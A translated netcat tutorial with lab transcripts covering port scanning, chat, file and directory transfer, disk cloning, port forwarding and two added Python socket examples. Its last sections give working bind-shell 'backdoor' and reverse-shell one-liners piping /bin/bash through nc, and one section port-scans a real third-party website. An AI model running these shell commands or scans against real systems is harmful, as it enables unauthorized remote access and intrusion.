netcat is the Swiss Army knife of networking tools: it reads and writes data across the network over TCP and UDP. Combined with other tools and shell redirection it can be used in scripts in many ways, and the number of things a single nc command can do is surprising.
All netcat really does is open a connection between two machines and hand you the two data streams; what you do with them is limited only by your imagination. You can build a server, transfer files, chat with a friend, stream media, or use it as a standalone client for other protocols.
netcat home page:
http://netcat.sourceforge.net/
nc is most often used to debug network programs, but with a little creativity this small tool can do things you would not expect. This article walks through the following:

Contents
- Lab environment
- Port scanning
- Network debugging: testing a remote network program
- Remote chat, TCP mode
- Remote chat, UDP mode
- Observe mode: no reading from standard input
- Automatic disconnect on timeout
- Keep listening after a client disconnects
- Acting as an HTTP client: connecting to Baidu
- File transfer
- Binary file transfer
- Directory transfer
- Streaming video
- Cloning a device
- Port forwarding
- System backdoor
- Reverse shell
Lab environment:
Two Linux hosts on the same LAN.
Server: IP 11.11.11.7, OS Ubuntu 14.04
    server$ sudo apt-get install netcat
Client: IP 11.11.11.4, OS CentOS 6.5
    client$ yum install nc
In the transcripts below the prompts are written as server$ (the Ubuntu host) and client$ (the CentOS host); a trailing # instead of $ means a root shell.
First, the relationship between netcat and nc on Linux:
    server$ which netcat
    /bin/netcat
    server$ which nc
    /bin/nc
    server$ md5sum /bin/netcat
    562d2661804f6ad900827bbfeb8c6350  /bin/netcat
    server$ md5sum /bin/nc
    562d2661804f6ad900827bbfeb8c6350  /bin/nc
Result: netcat and nc are the same program.
The nc command:
    server$ nc
    This is nc from the netcat-openbsd package. An alternative nc is available
    in the netcat-traditional package.
    usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]
              [-P proxy_username] [-p source_port] [-q seconds] [-s source]
              [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
              [-x proxy_address[:port]] [destination] [port]
Port scanning
Scan the LAN host 11.11.11.7 for open ports in the range 10 to 500:
    client$ nc -z 11.11.11.7 10-500
    Connection to 11.11.11.7 22 port [tcp/ssh] succeeded!
    Connection to 11.11.11.7 80 port [tcp/http] succeeded!
Scan the local machine's open ports in the range 10-500:
    client$ nc -z localhost 10-500
    Connection to localhost 22 port [tcp/ssh] succeeded!
    Connection to localhost 25 port [tcp/smtp] succeeded!
    Connection to localhost 111 port [tcp/sunrpc] succeeded!
The -z option only probes. Without it, nc stops at the first open port it finds and actually connects to it, so here it blocks on port 22 and the SSH banner comes back:
    client$ nc localhost 10-500
    SSH-2.0-OpenSSH_5.3
The -v option prints the result for every port, not only the open ones:
    client$ nc -zv localhost 20-30
    nc: connect to localhost port 20 (tcp) failed: Connection refused
    nc: connect to localhost port 20 (tcp) failed: Connection refused
    nc: connect to localhost port 21 (tcp) failed: Connection refused
    nc: connect to localhost port 21 (tcp) failed: Connection refused
    Connection to localhost 22 port [tcp/ssh] succeeded!
    nc: connect to localhost port 23 (tcp) failed: Connection refused
    nc: connect to localhost port 23 (tcp) failed: Connection refused
    nc: connect to localhost port 24 (tcp) failed: Connection refused
    nc: connect to localhost port 24 (tcp) failed: Connection refused
    Connection to localhost 25 port [tcp/smtp] succeeded!
    nc: connect to localhost port 26 (tcp) failed: Connection refused
    nc: connect to localhost port 26 (tcp) failed: Connection refused
    nc: connect to localhost port 27 (tcp) failed: Connection refused
    nc: connect to localhost port 27 (tcp) failed: Connection refused
    nc: connect to localhost port 28 (tcp) failed: Connection refused
    nc: connect to localhost port 28 (tcp) failed: Connection refused
    nc: connect to localhost port 29 (tcp) failed: Connection refused
    nc: connect to localhost port 29 (tcp) failed: Connection refused
    nc: connect to localhost port 30 (tcp) failed: Connection refused
    nc: connect to localhost port 30 (tcp) failed: Connection refused
Scanning how many ports the website www.dytt8.net has open (this is slow):
    client$ nc -z www.dytt8.net 20-32767
    Connection to www.dytt8.net 22 port [tcp/ssh] succeeded!
    Connection to www.dytt8.net 80 port [tcp/http] succeeded!
After several minutes of waiting it had turned up only 2 ports, which is not impressive. netcat is far too slow for port scanning; that job is better left to nmap, which finishes in 10 seconds:
    client$ nmap www.dytt8.net
    Starting Nmap 5.51 ( http://nmap.org ) at 2017-03-14 06:16 CST
    Nmap scan report for www.dytt8.net (117.25.129.231)
    Host is up (0.036s latency).
    Not shown: 988 closed ports
    PORT      STATE    SERVICE
    22/tcp    open     ssh
    80/tcp    open     http
    135/tcp   filtered msrpc
    139/tcp   filtered netbios-ssn
    443/tcp   open     https
    445/tcp   filtered microsoft-ds
    593/tcp   filtered http-rpc-epmap
    1068/tcp  filtered instl_bootc
    1434/tcp  filtered ms-sql-m
    4444/tcp  filtered krb524
    6667/tcp  filtered irc
    31337/tcp filtered Elite
Network debugging
The basic listen and connect forms (run as root in this session):
TCP, listen locally:
    # nc -l 8080
    # nc -l -p 8080
TCP, connect to a remote host:
    # nc 192.168.20.166 8080
UDP, listen locally:
    # nc -u -l 8080
UDP, connect to a remote host:
    # nc -u 192.168.20.18 8080
Remote chat, TCP mode
Server side:
    server$ ifconfig eth0
    eth0      Link encap:以太网  硬件地址 00:0c:29:29:0f:49
              inet 地址:11.11.11.7  广播:11.11.11.255  掩码:255.255.255.0
              inet6 地址: fe80::20c:29ff:fe29:f49/64 Scope:Link
              UP BROADCAST RUNNING MULTICAST  MTU:1500  跃点数:1
              接收数据包:5996 错误:0 丢弃:0 过载:0 帧数:0
              发送数据包:5066 错误:0 丢弃:0 过载:0 载波:0
              碰撞:0 发送队列长度:1000
              接收字节:4021349 (4.0 MB)  发送字节:439466 (439.4 KB)
The server starts listening:
    server$ nc -l 8080
Client side, connecting to the server with nc:
    client$ ifconfig eth0
    eth0      Link encap:Ethernet  HWaddr 00:0C:29:C7:07:FF
              inet addr:11.11.11.4  Bcast:11.11.11.255  Mask:255.255.255.0
              inet6 addr: fe80::20c:29ff:fec7:7ff/64 Scope:Link
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:15849 errors:0 dropped:0 overruns:0 frame:0
              TX packets:22615 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:4121990 (3.9 MiB)  TX bytes:2038587 (1.9 MiB)
              Interrupt:18 Base address:0x2000
    client$ nc 11.11.11.7 8080
    HelloWorld!
Now look at what the server window received, and type a reply:
    server$ nc -l 8080
    HelloWorld!
    shit 狗屎!
And the client window:
    client$ nc 11.11.11.7 8080
    HelloWorld!
    shit 狗屎!
From here on, the two sides can trade insults.
Remote chat, UDP mode
The server starts listening:
    server$ nc -u -l 8080
    狗屎!
    fuck!
The client connects:
    client$ nc -u 11.11.11.7 8080
    狗屎!
    fuck!
This way too, the two sides can start cursing at each other.
Automatic disconnect on timeout
Once a client has connected, if it sends nothing for 2 seconds the connection is dropped. If the client keeps sending, the connection stays up, and it is dropped as soon as 2 seconds pass without new data.
    server$ nc -w 2 -l 9999
    fd sf ds
    client$ nc 11.11.11.7 9999
    fdsfds fds f ds
Keep listening after a client disconnects
The server listens with -k, so it keeps accepting new connections after each client goes away:
    server$ nc -k -l 9999
    haha
    你好
    linux内核源代码中有脏话
The client connects, disconnects and connects again, repeatedly:
    client$ nc 11.11.11.7 9999
    haha
    ^C
    client$ nc 11.11.11.7 9999
    你好
    ^C
    client$ nc 11.11.11.7 9999
    linux内核源代码中有脏话
    ^C
    client$
Acting as an HTTP client: connecting to Baidu
Type GET / HTTP/1.1 and press Enter:
    client$ nc www.baidu.com 80
    GET / HTTP/1.1
The headers Baidu's HTTP server sends back:
    HTTP/1.1 302 Moved Temporarily
    Date: Mon, 13 Mar 2017 14:37:58 GMT
    Content-Type: text/html
    Content-Length: 215
    Connection: Keep-Alive
    Location: http://www.baidu.com/search/error.html
    Server: BWS/1.1
    X-UA-Compatible: IE=Edge,chrome=1
    BDPAGETYPE: 3
    Set-Cookie: BDSVRTM=0; path=/
And the body it sends back:
    <html>
    <head><title>302 Found</title></head>
    <body bgcolor="white">
    <center><h1>302 Found</h1></center>
    <hr><center>pr-nginx_1-0-330_BRANCH Branch Time : Mon Feb 27 16:21:40 CST 2017</center>
    </body>
    </html>
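As an added example (not code from the original post), here is the same exchange done from Python instead of by typing into nc. build_request produces the request bytes that go on the wire, including the Host header HTTP/1.1 requires and the blank line that marks the end of the headers, and parse_response pulls the status code and headers out of a reply like the one above. The sample reply is constructed from the headers shown on the page with a shortened body; www.baidu.com and port 80 are the page's own values.

```python
import socket

def build_request(host, path="/"):
    # The request the nc session types by hand, plus the Host header HTTP/1.1
    # requires and the empty line that terminates the header block.
    lines = [f"GET {path} HTTP/1.1", f"Host: {host}", "Connection: close", "", ""]
    return "\r\n".join(lines).encode("ascii")

def parse_response(raw):
    # Split a raw reply into (status_code, {lowercased-header-name: value}, body).
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, *header_lines = head.decode("iso-8859-1").split("\r\n")
    code = int(status_line.split(" ", 2)[1])      # "HTTP/1.1 302 Moved Temporarily"
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return code, headers, body

def fetch(host, port=80, path="/", timeout=5.0):
    # What `nc host 80` plus typing the request does, in one call (needs network).
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(host, path))
        raw = b"".join(iter(lambda: sock.recv(4096), b""))
    return parse_response(raw)

# Constructed sample: the 302 reply from the session above, re-typed with CRLF
# line endings and a shortened body (Content-Length left out so it stays consistent).
SAMPLE_302 = (
    b"HTTP/1.1 302 Moved Temporarily\r\n"
    b"Date: Mon, 13 Mar 2017 14:37:58 GMT\r\n"
    b"Content-Type: text/html\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Location: http://www.baidu.com/search/error.html\r\n"
    b"Server: BWS/1.1\r\n"
    b"\r\n"
    b"<html><head><title>302 Found</title></head></html>\r\n"
)
```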
File transfer
1. The server prepares to send a text file:
    server$ cat /etc/issue
    Ubuntu 14.04.5 LTS \n \l
    server$ cat /etc/issue | nc -l 7080
2. The client receives the text file:
    client$ nc 11.11.11.7 7080 > MyFile.txt
    client$ cat MyFile.txt
    Ubuntu 14.04.5 LTS \n \l
Binary file transfer with nc, server to client
    server$ dd if=/dev/zero bs=1M count=10 of=test.file
    记录了10+0 的读入
    记录了10+0 的写出
    10485760字节(10 MB)已复制,0.0109197 秒,960 MB/秒
    server$ md5sum test.file
    f1c9645dbc14efddc7d8a322685f26eb  test.file
    server$ cat test.file | nc -l 7080
    client$ nc 11.11.11.7 7080 > MyFile.txt
    client$ md5sum MyFile.txt
    f1c9645dbc14efddc7d8a322685f26eb  MyFile.txt
The checksums match, so the file arrived intact.
Binary file transfer with nc, client to server
    server$ nc -l 7080 > haha            # listen and wait for the data
    server$ md5sum haha
    cd573cfaace07e7949bc0c46028904ff  haha
    client$ dd if=/dev/zero bs=1G count=1 of=MyFile
    1+0 records in
    1+0 records out
    1073741824 bytes (1.1 GB) copied, 28.1895 s, 38.1 MB/s
    client$ md5sum MyFile
    cd573cfaace07e7949bc0c46028904ff  MyFile
    client$ nc 11.11.11.7 7080 < MyFile  # connect and send the data
Directory transfer, client directory to server
It is best to synchronise the clocks of server and client first:
    server$ sudo ntpdate cn.pool.ntp.org
    client$ sudo ntpdate cn.pool.ntp.org
The directory on the client:
    client$ ll .ssh/
    total 12
    -rw-rw-r--. 1 chunli chunli    8 Mar 14 06:55 Eng.xtt
    -rw-r--r--. 1 chunli chunli 1175 Mar 12 23:36 known_hosts
    -rw-rw-r--. 1 chunli chunli   13 Mar 14 06:55 中文.xtt
Check the files' MD5 values:
    client$ find .ssh/ -type f | xargs md5sum
    cd5e1e13f12927d85bcf7afd3c24e2b3  .ssh/Eng.xtt
    630960961f54d096058e703fb7c51841  .ssh/known_hosts
    6107f1d69a7d17430d5baa752c63c847  .ssh/中文.xtt
Once the server is listening, the client sends the directory as a tar stream:
    client$ tar -c .ssh/ | nc 11.11.11.7 6789
The server listens and unpacks what arrives:
    server$ cd /tmp/
    server:/tmp$ ll
    总用量 0
    server:/tmp$ nc -l 6789 | tar -x
    tar: .ssh:时间戳 2017-03-14 06:55:42 是未来的 28010.428611496 秒之后
    server:/tmp$ md5sum .ssh/*
    cd5e1e13f12927d85bcf7afd3c24e2b3  .ssh/Eng.xtt
    630960961f54d096058e703fb7c51841  .ssh/known_hosts
    6107f1d69a7d17430d5baa752c63c847  .ssh/中文.xtt
(The tar warning says the .ssh timestamp lies about 28010 seconds in the future, which is exactly why the clock synchronisation step was recommended.) As the checksums show, the files were not damaged in transit.
Streaming video
Install the player on the server and pipe the listener into it:
    server$ sudo apt-get install mplayer2
    server$ nc -l 8090 | mplayer -vo x11 -cache 1024 -    # type it exactly, including the trailing -
The client sends the video:
    client$ nc 11.11.11.7 8090 < 1.wmv
Ready to go! The video really does play while it is still being transferred.
Cloning a device: sending a disk's raw data over the network
    server$ sudo dd if=/dev/sda | nc -l 8080
    client$ sudo -s
    client# nc 11.11.11.7 8080 | dd of=/dev/sda
Port forwarding
The client connects to port 12345 on the server; the server forwards the data arriving on port 12345 to port 8000, and both sides can send to each other.
Server, window 1 (the service on port 8000, just listening):
    server$ nc -l 8000
    hahah
    你好, nc 端口转发
    我是客户端
    我是server
Server, window 2 (the forwarder; it does nothing but relay):
    server$ mkfifo myfif
    server$ cat myfif | nc localhost 8000 | nc -l 12345 > myfif
The client connects:
    client$ nc 11.11.11.7 12345
    hahah
    你好, nc 端口转发
    我是客户端
    我是server
How the pipeline works: bytes from the client come out of nc -l 12345 on stdout, are written into the FIFO, and cat feeds them into the stdin of nc localhost 8000; replies from port 8000 come out of that nc's stdout, which the pipe connects to the stdin of nc -l 12345, so they go straight back to the client.
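Added example, not part of the original post: the same relay written with Python sockets instead of mkfifo and two nc processes. In the shell pipeline the FIFO is the return path; here each direction of one connection gets its own copying thread, and half-closing the peer after EOF plays the role the pipe's EOF plays. start_echo_server stands in for the nc -l 8000 window, ports are chosen by the OS when given as 0, and everything stays on 127.0.0.1.

```python
import socket
import threading

def _pump(src, dst):
    # Copy src -> dst until EOF, then half-close dst so the EOF propagates onward.
    try:
        for chunk in iter(lambda: src.recv(4096), b""):
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass

def _bridge(client, target):
    # One accepted client: connect to target and pump both directions.
    with client, socket.create_connection(target) as upstream:
        back = threading.Thread(target=_pump, args=(upstream, client))
        back.start()
        _pump(client, upstream)
        back.join()

def _serve(handler, port=0):
    # Listen on 127.0.0.1:port (0 = OS picks one), run handler per connection; return port.
    srv = socket.create_server(("127.0.0.1", port))
    def loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=handler, args=(conn,), daemon=True).start()
    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]

def start_relay(listen_port, target):
    # Equivalent of: cat myfif | nc target_host target_port | nc -l listen_port > myfif
    return _serve(lambda c: _bridge(c, target), listen_port)

def start_echo_server(port=0):
    # Stand-in for the `nc -l 8000` window: sends back whatever arrives.
    return _serve(lambda c: _pump(c, c), port)

def send_through(port, payload):
    # Act like the client window: connect, send payload, return what comes back.
    with socket.create_connection(("127.0.0.1", port), timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        return b"".join(iter(lambda: s.recv(4096), b""))
```

Unlike the nc pipeline, which serves one client and then exits, the accept loop keeps going, so several clients can be relayed one after another.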
Opening a shell on the remote machine (system backdoor)
Even when netcat does not support the -c or -e options (the openbsd netcat), a remote shell can still be created.
Open the backdoor on the server:
    server$ mkfifo myfif
    server$ cat myfif | /bin/bash -i 2>&1 | nc -l 8080 > myfif
The client connects and lands straight in the server's shell:
    client$ nc 11.11.11.7 8080
    server$ ifconfig
    ifconfig
    eth0      Link encap:以太网  硬件地址 00:0c:29:29:0f:49
              inet 地址:11.11.11.7  广播:11.11.11.255  掩码:255.255.255.0
              inet6 地址: fe80::20c:29ff:fe29:f49/64 Scope:Link
              UP BROADCAST RUNNING MULTICAST  MTU:1500  跃点数:1
              接收数据包:185469 错误:0 丢弃:0 过载:0 帧数:0
              发送数据包:246469 错误:0 丢弃:0 过载:0 载波:0
              碰撞:0 发送队列长度:1000
              接收字节:165332900 (165.3 MB)  发送字节:357718332 (357.7 MB)

    lo        Link encap:本地环回
              inet 地址:127.0.0.1  掩码:255.0.0.0
              inet6 地址: ::1/128 Scope:Host
              UP LOOPBACK RUNNING  MTU:65536  跃点数:1
              接收数据包:409 错误:0 丢弃:0 过载:0 帧数:0
              发送数据包:409 错误:0 丢弃:0 过载:0 载波:0
              碰撞:0 发送队列长度:1
              接收字节:32719 (32.7 KB)  发送字节:32719 (32.7 KB)

    server$
Nothing in this pipeline authenticates or encrypts the session: whoever can reach port 8080 gets the shell, and everything typed crosses the network in plaintext.
Reverse shell
The server starts listening; the client then pushes its own shell back to the server, and it appears right in the server window:
    server$ nc -l 8080
    client$ ifconfig
    ifconfig
    eth0      Link encap:Ethernet  HWaddr 00:0C:29:C7:07:FF
              inet addr:11.11.11.4  Bcast:11.11.11.255  Mask:255.255.255.0
              inet6 addr: fe80::20c:29ff:fec7:7ff/64 Scope:Link
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:370527 errors:0 dropped:0 overruns:0 frame:0
              TX packets:147586 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:520873561 (496.7 MiB)  TX bytes:99872253 (95.2 MiB)
              Interrupt:18 Base address:0x2000

    lo        Link encap:Local Loopback
              inet addr:127.0.0.1  Mask:255.0.0.0
              inet6 addr: ::1/128 Scope:Host
              UP LOOPBACK RUNNING  MTU:16436  Metric:1
              RX packets:0 errors:0 dropped:0 overruns:0 frame:0
              TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

    client$
On the client, create the FIFO and connect back to the server (this is what produced the client prompt shown above in the server window):
    client$ mkfifo myfif
    client$ cat myfif | /bin/bash -i 2>&1 | nc 11.11.11.7 8080 > myfif
Date: 2024-09-29 09:29:51